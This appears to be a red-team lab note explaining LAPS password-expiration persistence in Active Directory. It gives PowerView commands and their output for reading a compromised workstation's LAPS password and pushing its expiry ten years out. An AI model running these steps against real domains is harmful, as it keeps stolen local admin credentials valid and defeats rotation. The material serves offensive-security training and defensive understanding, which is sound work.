Password Expiration Protection

Since we were able to compromise WKSTN-1 using its LAPS password, we can set its expiration long into the future as a form of persistence.

Get expiration

powershell Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

ms-mcs-admpwdexpirationtime ms-mcs-admpwd 
133101494718702551

Where 133101494718702551 is Thursday, 13 October 2022 15:44:31 GMT.

https://www.epochconverter.com/ldap

If we wanted to push the expiry out by 10 years, we can overwrite this value with 136257686710000000.

Every computer has delegated access to write to this password field, so we must elevate to SYSTEM on WKSTN-1.

powershell Set-DomainObject -Identity wkstn-1 -Set @{'ms-Mcs-AdmPwdExpirationTime' = '136257686710000000'} -Verbose Setting 'ms-Mcs-AdmPwdExpirationTime' to '136257686710000000' for object 'WKSTN-1$'

Last updated 2 years ago